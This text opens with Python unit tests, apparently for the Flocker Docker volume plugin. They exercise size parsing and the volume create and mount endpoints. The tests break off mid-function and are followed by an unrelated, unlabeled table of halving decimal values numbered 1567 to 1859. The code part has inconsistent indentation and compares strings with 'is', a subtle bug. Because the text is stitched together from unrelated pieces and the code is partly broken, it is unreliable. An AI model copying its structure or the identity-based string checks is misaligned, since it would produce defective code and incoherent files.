d = self.assertResult(b"POST", b"/VolumeDriver.Create",
{u"Name": name, 'Opts': {u"size": size_opt}},
OK, {u"Err": u""})
real_size = int(parse_num(size_opt).to_Byte())
d.addCallback(
lambda _: self.flocker_client.list_datasets_configuration())
d.addCallback(list)
d.addCallback(lambda result:
self.assertItemsEqual(
result, [
Dataset(dataset_id=result[0].dataset_id,
primary=self.NODE_A,
maximum_size=real_size,
metadata={NAME_FIELD: name,
u"maximum_size":
unicode(real_size)})]))
return d
    @given(expr=volume_expression,
           size=integers(min_value=75, max_value=100))
    def test_parsenum_size(self, expr, size):
        """
        Send different forms of size expressions
        to ``parse_num``, we expect G(Gigabyte) size results.

        :param expr str: A string representing the size expression
        :param size int: An integer giving the volume size
        """
        # Every suffix in volume_expression is a gigabyte spelling, so the
        # parsed result must equal `size` GiB in bytes.
        expected_size = int(GiB(size).to_Byte())
        return self.assertEqual(expected_size,
                                int(parse_num(str(size)+expr).to_Byte()))
@given(expr=sampled_from(["KB", "MB", "GB", "TB", ""]),
size=integers(min_value=1, max_value=100))
def test_parsenum_all_sizes(self, expr, size):
"""
Send standard size expressions to ``parse_num`` in
many sizes, we expect to get correct size results.
:param expr str: A string representing the size expression
:param size int: A string representing the volume size
"""
if expr is "KB":
expected_size = int(KiB(size).to_Byte())
elif expr is "MB":
expected_size = int(MiB(size).to_Byte())
elif expr is "GB":
expected_size = int(GiB(size).to_Byte())
elif expr is "TB":
expected_size = int(TiB(size).to_Byte())
else:
expected_size = int(Byte(size).to_Byte())
return self.assertEqual(expected_size,
int(parse_num(str(size)+expr).to_Byte()))
    @given(size=sampled_from([u"foo10Gb", u"10bar10", "10foogib",
                              "10Gfoo", "GIB", "bar10foo"]))
    def test_parsenum_bad_size(self, size):
        """
        Send unacceptable size expressions, upon error
        users should expect to receive Flocker's ``DEFAULT_SIZE``

        :param size str: A string representing the bad volume size
        """
        # Unparseable sizes fall back to the default rather than raising.
        return self.assertEqual(int(DEFAULT_SIZE.to_Byte()),
                                int(parse_num(size).to_Byte()))
    def create(self, name):
        """
        Call the ``/VolumeDriver.Create`` API to create a volume with the
        given name.

        :param unicode name: The name of the volume to create.

        :return: ``Deferred`` that fires when the volume has been created.
        """
        return self.assertResult(b"POST", b"/VolumeDriver.Create",
                                 {u"Name": name}, OK, {u"Err": u""})
    def test_create_creates(self):
        """
        ``/VolumeDriver.Create`` creates a new dataset in the configuration.
        """
        name = u"myvol"
        d = self.create(name)
        # After the endpoint succeeds, the fake Flocker client should hold
        # exactly one dataset, with the default size and the volume name
        # stored in the dataset metadata.
        d.addCallback(
            lambda _: self.flocker_client.list_datasets_configuration())
        d.addCallback(list)
        d.addCallback(lambda result:
                      self.assertItemsEqual(
                          result, [
                              Dataset(dataset_id=result[0].dataset_id,
                                      primary=self.NODE_A,
                                      maximum_size=int(DEFAULT_SIZE.to_Byte()),
                                      metadata={NAME_FIELD: name})]))
        return d
    def test_create_duplicate_name(self):
        """
        If a dataset with the given name already exists,
        ``/VolumeDriver.Create`` succeeds without creating a new volume.
        """
        name = u"thename"
        # Create a dataset out-of-band with matching name but non-matching
        # dataset ID:
        d = self.flocker_client.create_dataset(
            self.NODE_A, int(DEFAULT_SIZE.to_Byte()),
            metadata={NAME_FIELD: name})
        d.addCallback(lambda _: self.create(name))
        # Still only one dataset: the plugin reused the existing one.
        d.addCallback(
            lambda _: self.flocker_client.list_datasets_configuration())
        d.addCallback(lambda results: self.assertEqual(len(list(results)), 1))
        return d
    def test_create_duplicate_name_race_condition(self):
        """
        If a dataset with the given name is created while the
        ``/VolumeDriver.Create`` call is in flight, the call does not
        result in an error.
        """
        name = u"thename"
        # Create a dataset out-of-band with matching dataset ID and name
        # which the docker plugin won't be able to see.
        def create_after_list():
            # Clean up the patched version:
            del self.flocker_client.list_datasets_configuration
            # But first time we're called, we create dataset and lie about
            # its existence:
            d = self.flocker_client.create_dataset(
                self.NODE_A, int(DEFAULT_SIZE.to_Byte()),
                metadata={NAME_FIELD: name})
            d.addCallback(lambda _: DatasetsConfiguration(
                tag=u"1234", datasets={}))
            return d
        # Patch the proxy instance so the plugin's configuration listing
        # triggers the racing create exactly once.
        self.flocker_client.list_datasets_configuration = create_after_list
        return self.create(name)
    def _flush_volume_plugin_reactor_on_endpoint_render(self):
        """
        This method patches ``self.app`` so that after any endpoint is
        rendered, the reactor used by the volume plugin is advanced repeatedly
        until there are no more ``delayedCalls`` pending on the reactor.
        """
        real_execute_endpoint = self.app.execute_endpoint
        def patched_execute_endpoint(*args, **kwargs):
            val = real_execute_endpoint(*args, **kwargs)
            while self.volume_plugin_reactor.getDelayedCalls():
                pending_calls = self.volume_plugin_reactor.getDelayedCalls()
                # Jump the fake clock straight to the earliest scheduled
                # call; max(0.0, ...) guards against already-due calls so
                # the clock never moves backwards.
                next_expiration = min(t.getTime() for t in pending_calls)
                now = self.volume_plugin_reactor.seconds()
                self.volume_plugin_reactor.advance(
                    max(0.0, next_expiration - now))
            return val
        self.patch(self.app, 'execute_endpoint', patched_execute_endpoint)
    def test_mount(self):
        """
        ``/VolumeDriver.Mount`` sets the primary of the dataset with matching
        name to the current node and then waits for the dataset to
        actually arrive.
        """
        name = u"myvol"
        dataset_id = uuid4()
        # Docker supplies a 64-character hex ID with the mount request.
        mount_id = ''.join(random.choice(
            '0123456789abcdef') for n in xrange(64))
        # Create dataset on a different node:
        d = self.flocker_client.create_dataset(
            self.NODE_B, int(DEFAULT_SIZE.to_Byte()),
            metadata={NAME_FIELD: name},
            dataset_id=dataset_id)
        self._flush_volume_plugin_reactor_on_endpoint_render()
        # Pretend that it takes 5 seconds for the dataset to get established on
        # Node A.
        self.volume_plugin_reactor.callLater(
            5.0, self.flocker_client.synchronize_state)
        d.addCallback(lambda _:
                      self.assertResult(
                          b"POST", b"/VolumeDriver.Mount",
                          {u"Name": name, u"ID": unicode(mount_id)}, OK,
                          {u"Err": u"",
                           u"Mountpoint": u"/flocker/{}".format(dataset_id)}))
        d.addCallback(lambda _: self.flocker_client.list_datasets_state())
        def final_assertions(datasets):
            # The mount must have moved the dataset's primary to this node.
            self.assertEqual([self.NODE_A],
                             [d.primary for d in datasets
                              if d.dataset_id == dataset_id])
            # There should be less than 20 calls to list_datasets_state over
            # the course of 5 seconds.
            self.assertLess(
                self.flocker_client.num_calls('list_datasets_state'), 20)
        d.addCallback(final_assertions)
        return d
def test_mount_no_id(self):
"""
``/VolumeDriver.Mount`` sets the primary of the dataset with matching
name to the current node and then waits for the dataset to
actually arrive.
No ID for backward compatability with Docker < 1.12
"""
name = u"myvol"
dataset_id = uuid4()
# Create dataset on a different node:
d = self.flocker_client.create_dataset(
self.NODE_B, int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name},
dataset_id=dataset_id)
self._flush_volume_plugin_reactor_on_endpoint_render()
# Pretend that it takes 5 seconds for the dataset to get established on
# Node A.
self.volume_plugin_reactor.callLater(
5.0, self.flocker_client.synchronize_state)
d.addCallback(lambda _:
self.assertResult(
b"POST", b"/VolumeDriver.Mount",
{u"Name": name}, OK,
{u"Err": u"",
u"Mountpoint": u"/flocker/{}".format(dataset_id)}))
d.addCallback(lambda _: self.flocker_client.list_datasets_state())
def final_assertions(datasets):
self.assertEqual([self.NODE_A],
[d.primary for d in datasets
if d.dataset_id == dataset_id])
# There should be less than 20 calls to list_datasets_state over
# the course of 5 seconds.
| |
1567 3.732446480362260781946102655672169E-944 1.866223240181130390973051327836085E-944
1568 9.331116200905651954865256639180425E-945 4.665558100452825977432628319590213E-945
1569 2.332779050226412988716314159795107E-945 1.166389525113206494358157079897553E-945
1570 5.831947625566032471790785399487765E-946 2.915973812783016235895392699743883E-946
1571 1.457986906391508117947696349871942E-946 7.289934531957540589738481749359708E-947
1572 3.644967265978770294869240874679854E-947 1.822483632989385147434620437339927E-947
1573 9.112418164946925737173102186699635E-948 4.556209082473462868586551093349818E-948
1574 2.278104541236731434293275546674909E-948 1.139052270618365717146637773337455E-948
1575 5.695261353091828585733188866687275E-949 2.847630676545914292866594433343638E-949
1576 1.423815338272957146433297216671819E-949 7.119076691364785732166486083359095E-950
1577 3.559538345682392866083243041679548E-950 1.779769172841196433041621520839774E-950
1578 8.89884586420598216520810760419887E-951 4.449422932102991082604053802099435E-951
1579 2.224711466051495541302026901049718E-951 1.112355733025747770651013450524859E-951
1580 5.561778665128738853255067252624295E-952 2.780889332564369426627533626312148E-952
1581 1.390444666282184713313766813156074E-952 6.95222333141092356656883406578037E-953
1582 3.476111665705461783284417032890185E-953 1.738055832852730891642208516445093E-953
1583 8.690279164263654458211042582225465E-954 4.345139582131827229105521291112733E-954
1584 2.172569791065913614552760645556367E-954 1.086284895532956807276380322778183E-954
1585 5.431424477664784036381901613890915E-955 2.715712238832392018190950806945458E-955
1586 1.357856119416196009095475403472729E-955 6.789280597080980045477377017363645E-956
1587 3.394640298540490022738688508681823E-956 1.697320149270245011369344254340911E-956
1588 8.486600746351225056846721271704555E-957 4.243300373175612528423360635852278E-957
1589 2.121650186587806264211680317926139E-957 1.060825093293903132105840158963070E-957
1590 5.30412546646951566052920079481535E-958 2.652062733234757830264600397407675E-958
1591 1.326031366617378915132300198703838E-958 6.630156833086894575661500993519188E-959
1592 3.315078416543447287830750496759594E-959 1.657539208271723643915375248379797E-959
1593 8.287696041358618219576876241898985E-960 4.143848020679309109788438120949493E-960
1594 2.071924010339654554894219060474747E-960 1.035962005169827277447109530237373E-960
1595 5.179810025849136387235547651186865E-961 2.589905012924568193617773825593433E-961
1596 1.294952506462284096808886912796717E-961 6.474762532311420484044434563983583E-962
1597 3.237381266155710242022217281991792E-962 1.618690633077855121011108640995896E-962
1598 8.09345316538927560505554320497948E-963 4.04672658269463780252777160248974E-963
1599 2.02336329134731890126388580124487E-963 1.011681645673659450631942900622435E-963
1600 5.058408228368297253159714503112175E-964 2.529204114184148626579857251556088E-964
1601 1.264602057092074313289928625778044E-964 6.32301028546037156644964312889022E-965
1602 3.16150514273018578322482156444511E-965 1.580752571365092891612410782222555E-965
1603 7.903762856825464458062053911112775E-966 3.951881428412732229031026955556388E-966
1604 1.975940714206366114515513477778194E-966 9.87970357103183057257756738889097E-967
1605 4.939851785515915286288783694445485E-967 2.469925892757957643144391847222743E-967
1606 1.234962946378978821572195923611372E-967 6.174814731894894107860979618056858E-968
1607 3.087407365947447053930489809028429E-968 1.543703682973723526965244904514215E-968
1608 7.718518414868617634826224522571075E-969 3.859259207434308817413112261285538E-969
1609 1.929629603717154408706556130642769E-969 9.648148018585772043532780653213845E-970
1610 4.824074009292886021766390326606923E-970 2.412037004646443010883195163303461E-970
1611 1.206018502323221505441597581651731E-970 6.030092511616107527207987908258653E-971
1612 3.015046255808053763603993954129327E-971 1.507523127904026881801996977064663E-971
1613 7.537615639520134409009984885323315E-972 3.768807819760067204504992442661658E-972
1614 1.884403909880033602252496221330829E-972 9.422019549400168011262481106654145E-973
1615 4.711009774700084005631240553327073E-973 2.355504887350042002815620276663536E-973
1616 1.177752443675021001407810138331768E-973 5.88876221837510500703905069165884E-974
1617 2.94438110918755250351952534582942E-974 1.47219055459377625175976267291471E-974
1618 7.36095277296888125879881336457355E-975 3.680476386484440629399406682286775E-975
1619 1.840238193242220314699703341143388E-975 9.201190966211101573498516705716938E-976
1620 4.600595483105550786749258352858469E-976 2.300297741552775393374629176429235E-976
1621 1.150148870776387696687314588214618E-976 5.750744353881938483436572941073088E-977
1622 2.875372176940969241718286470536544E-977 1.437686088470484620859143235268272E-977
1623 7.18843044235242310429571617634136E-978 3.59421522117621155214785808817068E-978
1624 1.79710761058810577607392904408534E-978 8.9855380529405288803696452204267E-979
1625 4.49276902647026444018482261021335E-979 2.246384513235132220092411305106675E-979
1626 1.123192256617566110046205652553338E-979 5.615961283087830550231028262766688E-980
1627 2.807980641543915275115514131383344E-980 1.403990320771957637557757065691672E-980
1628 7.01995160385978818778878532845836E-981 3.50997580192989409389439266422918E-981
1629 1.75498790096494704694719633211459E-981 8.77493950482473523473598166057295E-982
1630 4.387469752412367617367990830286475E-982 2.193734876206183808683995415143238E-982
1631 1.096867438103091904341997707571619E-982 5.484337190515459521709988537858095E-983
1632 2.742168595257729760854994268929048E-983 1.371084297628864880427497134464524E-983
1633 6.85542148814432440213748567232262E-984 3.42771074407216220106874283616131E-984
1634 1.713855372036081100534371418080655E-984 8.569276860180405502671857090403275E-985
1635 4.284638430090202751335928545201638E-985 2.142319215045101375667964272600819E-985
1636 1.071159607522550687833982136300410E-985 5.355798037612753439169910681502048E-986
1637 2.677899018806376719584955340751024E-986 1.338949509403188359792477670375512E-986
1638 6.69474754701594179896238835187756E-987 3.34737377350797089948119417593878E-987
1639 1.67368688675398544974059708796939E-987 8.36843443376992724870298543984695E-988
1640 4.184217216884963624351492719923475E-988 2.092108608442481812175746359961738E-988
1641 1.046054304221240906087873179980869E-988 5.230271521106204530439365899904345E-989
1642 2.615135760553102265219682949952173E-989 1.307567880276551132609841474976086E-989
1643 6.53783940138275566304920737488043E-990 3.268919700691377831524603687440215E-990
1644 1.634459850345688915762301843720108E-990 8.172299251728444578811509218600538E-991
1645 4.086149625864222289405754609300269E-991 2.043074812932111144702877304650135E-991
1646 1.021537406466055572351438652325068E-991 5.107687032330277861757193261625338E-992
1647 2.553843516165138930878596630812669E-992 1.276921758082569465439298315406335E-992
1648 6.384608790412847327196491577031675E-993 3.192304395206423663598245788515838E-993
1649 1.596152197603211831799122894257919E-993 7.980760988016059158995614471289595E-994
1650 3.990380494008029579497807235644798E-994 1.995190247004014789748903617822399E-994
1651 9.975951235020073948744518089111995E-995 4.987975617510036974372259044555998E-995
1652 2.493987808755018487186129522277999E-995 1.246993904377509243593064761139000E-995
1653 6.23496952188754621796532380569500E-996 3.11748476094377310898266190284750E-996
1654 1.55874238047188655449133095142375E-996 7.79371190235943277245665475711875E-997
1655 3.896855951179716386228327378559375E-997 1.948427975589858193114163689279688E-997
1656 9.74213987794929096557081844639844E-998 4.87106993897464548278540922319922E-998
1657 2.43553496948732274139270461159961E-998 1.217767484743661370696352305799805E-998
1658 6.088837423718306853481761528999025E-999 3.044418711859153426740880764499513E-999
1659 1.522209355929576713370440382249757E-999 7.611046779647883566852201911248783E-1000
1660 3.805523389823941783426100955624392E-1000 1.902761694911970891713050477812196E-1000
1661 9.51380847455985445856525238906098E-1001 4.75690423727992722928262619453049E-1001
1662 2.378452118639963614641313097265245E-1001 1.189226059319981807320656548632623E-1001
1663 5.946130296599909036603282743163115E-1002 2.973065148299954518301641371581558E-1002
1664 1.486532574149977259150820685790779E-1002 7.432662870749886295754103428953895E-1003
1665 3.716331435374943147877051714476948E-1003 1.858165717687471573938525857238474E-1003
1666 9.29082858843735786969262928619237E-1004 4.645414294218678934846314643096185E-1004
1667 2.322707147109339467423157321548093E-1004 1.161353573554669733711578660774046E-1004
1668 5.80676786777334866855789330387023E-1005 2.903383933886674334278946651935115E-1005
1669 1.451691966943337167139473325967558E-1005 7.258459834716685835697366629837788E-1006
1670 3.629229917358342917848683314918894E-1006 1.814614958679171458924341657459447E-1006
1671 9.073074793395857294621708287297235E-1007 4.536537396697928647310854143648618E-1007
1672 2.268268698348964323655427071824309E-1007 1.134134349174482161827713535912155E-1007
1673 5.670671745872410809138567679560775E-1008 2.835335872936205404569283839780388E-1008
1674 1.417667936468102702284641919890194E-1008 7.08833968234051351142320959945097E-1009
1675 3.544169841170256755711604799725485E-1009 1.772084920585128377855802399862743E-1009
1676 8.860424602925641889279011999313715E-1010 4.430212301462820944639505999656858E-1010
1677 2.215106150731410472319752999828429E-1010 1.107553075365705236159876499914215E-1010
1678 5.537765376828526180799382499571075E-1011 2.768882688414263090399691249785538E-1011
1679 1.384441344207131545199845624892769E-1011 6.922206721035657725999228124463845E-1012
1680 3.461103360517828862999614062231923E-1012 1.730551680258914431499807031115961E-1012
1681 8.652758401294572157499035155579805E-1013 4.326379200647286078749517577789903E-1013
1682 2.163189600323643039374758788894952E-1013 1.081594800161821519687379394447476E-1013
1683 5.40797400080910759843689697223738E-1014 2.70398700040455379921844848611869E-1014
1684 1.351993500202276899609224243059345E-1014 6.759967501011384498046121215296725E-1015
1685 3.379983750505692249023060607648363E-1015 1.689991875252846124511530303824181E-1015
1686 8.449959376264230622557651519120905E-1016 4.224979688132115311278825759560453E-1016
1687 2.112489844066057655639412879780227E-1016 1.056244922033028827819706439890113E-1016
1688 5.281224610165144139098532199450565E-1017 2.640612305082572069549266099725283E-1017
1689 1.320306152541286034774633049862642E-1017 6.601530762706430173873165249313208E-1018
1690 3.300765381353215086936582624656604E-1018 1.650382690676607543468291312328302E-1018
1691 8.25191345338303771734145656164151E-1019 4.125956726691518858670728280820755E-1019
1692 2.062978363345759429335364140410378E-1019 1.031489181672879714667682070205189E-1019
1693 5.157445908364398573338410351025945E-1020 2.578722954182199286669205175512973E-1020
1694 1.289361477091099643334602587756487E-1020 6.446807385455498216673012938782433E-1021
1695 3.223403692727749108336506469391217E-1021 1.611701846363874554168253234695608E-1021
1696 8.05850923181937277084126617347804E-1022 4.02925461590968638542063308673902E-1022
1697 2.01462730795484319271031654336951E-1022 1.007313653977421596355158271684755E-1022
1698 5.036568269887107981775791358423775E-1023 2.518284134943553990887895679211888E-1023
1699 1.259142067471776995443947839605944E-1023 6.29571033735888497721973919802972E-1024
1700 3.14785516867944248860986959901486E-1024 1.57392758433972124430493479950743E-1024
1701 7.86963792169860622152467399753715E-1025 3.934818960849303110762336998768575E-1025
1702 1.967409480424651555381168499384288E-1025 9.837047402123257776905842496921438E-1026
1703 4.918523701061628888452921248460719E-1026 2.459261850530814444226460624230360E-1026
1704 1.229630925265407222113230312115180E-1026 6.14815462632703611056615156057590E-1027
1705 3.07407731316351805528307578028795E-1027 1.537038656581759027641537890143975E-1027
1706 7.685193282908795138207689450719875E-1028 3.842596641454397569103844725359938E-1028
1707 1.921298320727198784551922362679969E-1028 9.606491603635993922759611813399845E-1029
1708 4.803245801817996961379805906699923E-1029 2.401622900908998480689902953349961E-1029
1709 1.200811450454499240344951476674981E-1029 6.004057252272496201724757383374903E-1030
1710 3.002028626136248100862378691687452E-1030 1.501014313068124050431189345843726E-1030
1711 7.50507156534062025215594672921863E-1031 3.752535782670310126077973364609315E-1031
1712 1.876267891335155063038986682304658E-1031 9.381339456675775315194933411523288E-1032
1713 4.690669728337887657597466705761644E-1032 2.345334864168943828798733352880822E-1032
1714 1.172667432084471914399366676440411E-1032 5.863337160422359571996833382202055E-1033
1715 2.931668580211179785998416691101028E-1033 1.465834290105589892999208345550514E-1033
1716 7.32917145052794946499604172775257E-1034 3.664585725263974732498020863876285E-1034
1717 1.832292862631987366249010431938143E-1034 9.161464313159936831245052159690713E-1035
1718 4.580732156579968415622526079845357E-1035 2.290366078289984207811263039922678E-1035
1719 1.145183039144992103905631519961339E-1035 5.725915195724960519528157599806695E-1036
1720 2.862957597862480259764078799903348E-1036 1.431478798931240129882039399951674E-1036
1721 7.15739399465620064941019699975837E-1037 3.578696997328100324705098499879185E-1037
1722 1.789348498664050162352549249939593E-1037 8.946742493320250811762746249697963E-1038
1723 4.473371246660125405881373124848982E-1038 2.236685623330062702940686562424491E-1038
1724 1.118342811665031351470343281212246E-1038 5.591714058325156757351716406061228E-1039
1725 2.795857029162578378675858203030614E-1039 1.397928514581289189337929101515307E-1039
1726 6.989642572906445946689645507576535E-1040 3.494821286453222973344822753788268E-1040
1727 1.747410643226611486672411376894134E-1040 8.73705321613305743336205688447067E-1041
1728 4.368526608066528716681028442235335E-1041 2.184263304033264358340514221117668E-1041
1729 1.092131652016632179170257110558834E-1041 5.46065826008316089585128555279417E-1042
1730 2.730329130041580447925642776397085E-1042 1.365164565020790223962821388198543E-1042
1731 6.825822825103951119814106940992715E-1043 3.412911412551975559907053470496358E-1043
1732 1.706455706275987779953526735248179E-1043 8.532278531379938899767633676240895E-1044
1733 4.266139265689969449883816838120448E-1044 2.133069632844984724941908419060224E-1044
1734 1.066534816422492362470954209530112E-1044 5.33267408211246181235477104765056E-1045
1735 2.66633704105623090617738552382528E-1045 1.33316852052811545308869276191264E-1045
1736 6.6658426026405772654434638095632E-1046 3.3329213013202886327217319047816E-1046
1737 1.6664606506601443163608659523908E-1046 8.332303253300721581804329761954E-1047
1738 4.166151626650360790902164880977E-1047 2.0830758133251803954510824404885E-1047
1739 1.04153790666259019772554122024425E-1047 5.20768953331295098862770610122125E-1048
1740 2.603844766656475494313853050610625E-1048 1.301922383328237747156926525305313E-1048
1741 6.509611916641188735784632626526565E-1049 3.254805958320594367892316313263283E-1049
1742 1.627402979160297183946158156631642E-1049 8.137014895801485919730790783158208E-1050
1743 4.068507447900742959865395391579104E-1050 2.034253723950371479932697695789552E-1050
1744 1.017126861975185739966348847894776E-1050 5.08563430987592869983174423947388E-1051
1745 2.54281715493796434991587211973694E-1051 1.27140857746898217495793605986847E-1051
1746 6.35704288734491087478968029934235E-1052 3.178521443672455437394840149671175E-1052
1747 1.589260721836227718697420074835588E-1052 7.946303609181138593487100374177938E-1053
1748 3.973151804590569296743550187088969E-1053 1.986575902295284648371775093544485E-1053
1749 9.932879511476423241858875467722425E-1054 4.966439755738211620929437733861213E-1054
1750 2.483219877869105810464718866930607E-1054 1.241609938934552905232359433465303E-1054
1751 6.208049694672764526161797167326515E-1055 3.104024847336382263080898583663258E-1055
1752 1.552012423668191131540449291831629E-1055 7.760062118340955657702246459158145E-1056
1753 3.880031059170477828851123229579073E-1056 1.940015529585238914425561614789536E-1056
1754 9.70007764792619457212780807394768E-1057 4.85003882396309728606390403697384E-1057
1755 2.42501941198154864303195201848692E-1057 1.21250970599077432151597600924346E-1057
1756 6.0625485299538716075798800462173E-1058 3.03127426497693580378994002310865E-1058
1757 1.515637132488467901894970011554325E-1058 7.578185662442339509474850057771625E-1059
1758 3.789092831221169754737425028885813E-1059 1.894546415610584877368712514442906E-1059
1759 9.47273207805292438684356257221453E-1060 4.736366039026462193421781286107265E-1060
1760 2.368183019513231096710890643053633E-1060 1.184091509756615548355445321526816E-1060
1761 5.92045754878307774177722660763408E-1061 2.96022877439153887088861330381704E-1061
1762 1.48011438719576943544430665190852E-1061 7.4005719359788471772215332595426E-1062
1763 3.7002859679894235886107666297713E-1062 1.85014298399471179430538331488565E-1062
1764 9.25071491997355897152691657442825E-1063 4.625357459986779485763458287214125E-1063
1765 2.312678729993389742881729143607063E-1063 1.156339364996694871440864571803531E-1063
1766 5.781696824983474357204322859017655E-1064 2.890848412491737178602161429508828E-1064
1767 1.445424206245868589301080714754414E-1064 7.22712103122934294650540357377207E-1065
1768 3.613560515614671473252701786886035E-1065 1.806780257807335736626350893443018E-1065
1769 9.03390128903667868313175446721509E-1066 4.516950644518339341565877233607545E-1066
1770 2.258475322259169670782938616803773E-1066 1.129237661129584835391469308401886E-1066
1771 5.64618830564792417695734654200943E-1067 2.823094152823962088478673271004715E-1067
1772 1.411547076411981044239336635502358E-1067 7.057735382059905221196683177511788E-1068
1773 3.528867691029952610598341588755894E-1068 1.764433845514976305299170794377947E-1068
1774 8.822169227574881526495853971889735E-1069 4.411084613787440763247926985944868E-1069
1775 2.205542306893720381623963492972434E-1069 1.102771153446860190811981746486217E-1069
1776 5.513855767234300954059908732431085E-1070 2.756927883617150477029954366215543E-1070
1777 1.378463941808575238514977183107772E-1070 6.892319709042876192574885915538858E-1071
1778 3.446159854521438096287442957769429E-1071 1.723079927260719048143721478884715E-1071
1779 8.615399636303595240718607394423575E-1072 4.307699818151797620359303697211788E-1072
1780 2.153849909075898810179651848605894E-1072 1.076924954537949405089825924302947E-1072
1781 5.384624772689747025449129621514735E-1073 2.692312386344873512724564810757368E-1073
1782 1.346156193172436756362282405378684E-1073 6.73078096586218378181141202689342E-1074
1783 3.36539048293109189090570601344671E-1074 1.682695241465545945452853006723355E-1074
1784 8.413476207327729727264265033616775E-1075 4.206738103663864863632132516808388E-1075
1785 2.103369051831932431816066258404194E-1075 1.051684525915966215908033129202097E-1075
1786 5.258422629579831079540165646010485E-1076 2.629211314789915539770082823005243E-1076
1787 1.314605657394957769885041411502622E-1076 6.573028286974788849425207057513108E-1077
1788 3.286514143487394424712603528756554E-1077 1.643257071743697212356301764378277E-1077
1789 8.216285358718486061781508821891385E-1078 4.108142679359243030890754410945693E-1078
1790 2.054071339679621515445377205472847E-1078 1.027035669839810757722688602736423E-1078
1791 5.135178349199053788613443013682115E-1079 2.567589174599526894306721506841058E-1079
1792 1.283794587299763447153360753420529E-1079 6.418972936498817235766803767102645E-1080
1793 3.209486468249408617883401883551323E-1080 1.604743234124704308941700941775661E-1080
1794 8.023716170623521544708504708878305E-1081 4.011858085311760772354252354439153E-1081
1795 2.005929042655880386177126177219577E-1081 1.002964521327940193088563088609788E-1081
1796 5.01482260663970096544281544304894E-1082 2.50741130331985048272140772152447E-1082
1797 1.253705651659925241360703860762235E-1082 6.268528258299626206803519303811175E-1083
1798 3.134264129149813103401759651905588E-1083 1.567132064574906551700879825952794E-1083
1799 7.83566032287453275850439912976397E-1084 3.917830161437266379252199564881985E-1084
1800 1.958915080718633189626099782440993E-1084 9.794575403593165948130498912204963E-1085
1801 4.897287701796582974065249456102482E-1085 2.448643850898291487032624728051241E-1085
1802 1.224321925449145743516312364025621E-1085 6.121609627245728717581561820128103E-1086
1803 3.060804813622864358790780910064052E-1086 1.530402406811432179395390455032026E-1086
1804 7.65201203405716089697695227516013E-1087 3.826006017028580448488476137580065E-1087
1805 1.913003008514290224244238068790033E-1087 9.565015042571451121221190343950163E-1088
1806 4.782507521285725560610595171975082E-1088 2.391253760642862780305297585987541E-1088
1807 1.195626880321431390152648792993771E-1088 5.978134401607156950763243964968853E-1089
1808 2.989067200803578475381621982484427E-1089 1.494533600401789237690810991242213E-1089
1809 7.472668002008946188454054956211065E-1090 3.736334001004473094227027478105533E-1090
1810 1.868167000502236547113513739052767E-1090 9.340835002511182735567568695263833E-1091
1811 4.670417501255591367783784347631917E-1091 2.335208750627795683891892173815958E-1091
1812 1.167604375313897841945946086907979E-1091 5.838021876569489209729730434539895E-1092
1813 2.919010938284744604864865217269948E-1092 1.459505469142372302432432608634974E-1092
1814 7.29752734571186151216216304317487E-1093 3.648763672855930756081081521587435E-1093
1815 1.824381836427965378040540760793718E-1093 9.121909182139826890202703803968588E-1094
1816 4.560954591069913445101351901984294E-1094 2.280477295534956722550675950992147E-1094
1817 1.140238647767478361275337975496074E-1094 5.701193238837391806376689877480368E-1095
1818 2.850596619418695903188344938740184E-1095 1.425298309709347951594172469370092E-1095
1819 7.12649154854673975797086234685046E-1096 3.56324577427336987898543117342523E-1096
1820 1.781622887136684939492715586712615E-1096 8.908114435683424697463577933563075E-1097
1821 4.454057217841712348731788966781538E-1097 2.227028608920856174365894483390769E-1097
1822 1.113514304460428087182947241695385E-1097 5.567571522302140435914736208476923E-1098
1823 2.783785761151070217957368104238462E-1098 1.391892880575535108978684052119231E-1098
1824 6.959464402877675544893420260596155E-1099 3.479732201438837772446710130298078E-1099
1825 1.739866100719418886223355065149039E-1099 8.699330503597094431116775325745195E-1100
1826 4.349665251798547215558387662872598E-1100 2.174832625899273607779193831436299E-1100
1827 1.087416312949636803889596915718150E-1100 5.437081564748184019447984578590748E-1101
1828 2.718540782374092009723992289295374E-1101 1.359270391187046004861996144647687E-1101
1829 6.796351955935230024309980723238435E-1102 3.398175977967615012154990361619218E-1102
1830 1.699087988983807506077495180809609E-1102 8.495439944919037530387475904048045E-1103
1831 4.247719972459518765193737952024023E-1103 2.123859986229759382596868976012011E-1103
1832 1.061929993114879691298434488006006E-1103 5.309649965574398456492172440030028E-1104
1833 2.654824982787199228246086220015014E-1104 1.327412491393599614123043110007507E-1104
1834 6.637062456967998070615215550037535E-1105 3.318531228483999035307607775018768E-1105
1835 1.659265614241999517653803887509384E-1105 8.29632807120999758826901943754692E-1106
1836 4.14816403560499879413450971877346E-1106 2.07408201780249939706725485938673E-1106
1837 1.037041008901249698533627429693365E-1106 5.185205044506248492668137148466825E-1107
1838 2.592602522253124246334068574233413E-1107 1.296301261126562123167034287116706E-1107
1839 6.48150630563281061583517143558353E-1108 3.240753152816405307917585717791765E-1108
1840 1.620376576408202653958792858895883E-1108 8.101882882041013269793964294479413E-1109
1841 4.050941441020506634896982147239707E-1109 2.025470720510253317448491073619853E-1109
1842 1.012735360255126658724245536809927E-1109 5.063676801275633293621227684049633E-1110
1843 2.531838400637816646810613842024817E-1110 1.265919200318908323405306921012408E-1110
1844 6.32959600159454161702653460506204E-1111 3.16479800079727080851326730253102E-1111
1845 1.58239900039863540425663365126551E-1111 7.91199500199317702128316825632755E-1112
1846 3.955997500996588510641584128163775E-1112 1.977998750498294255320792064081888E-1112
1847 9.88999375249147127660396032040944E-1113 4.94499687624573563830198016020472E-1113
1848 2.47249843812286781915099008010236E-1113 1.23624921906143390957549504005118E-1113
1849 6.1812460953071695478774752002559E-1114 3.09062304765358477393873760012795E-1114
1850 1.545311523826792386969368800063975E-1114 7.726557619133961934846844000319875E-1115
1851 3.863278809566980967423422000159938E-1115 1.931639404783490483711711000079969E-1115
1852 9.658197023917452418558555000399845E-1116 4.829098511958726209279277500199923E-1116
1853 2.414549255979363104639638750099962E-1116 1.207274627989681552319819375049981E-1116
1854 6.036373139948407761599096875249905E-1117 3.018186569974203880799548437624953E-1117
1855 1.509093284987101940399774218812477E-1117 7.545466424935509701998871094062383E-1118
1856 3.772733212467754850999435547031192E-1118 1.886366606233877425499717773515596E-1118
1857 9.43183303116938712749858886757798E-1119 4.71591651558469356374929443378899E-1119
1858 2.357958257792346781874647216894495E-1119 1.178979128896173390937323608447248E-1119
1859 5.89489564448086695468661804223624E-1120 2.94744782224043347734330902111812E-1120
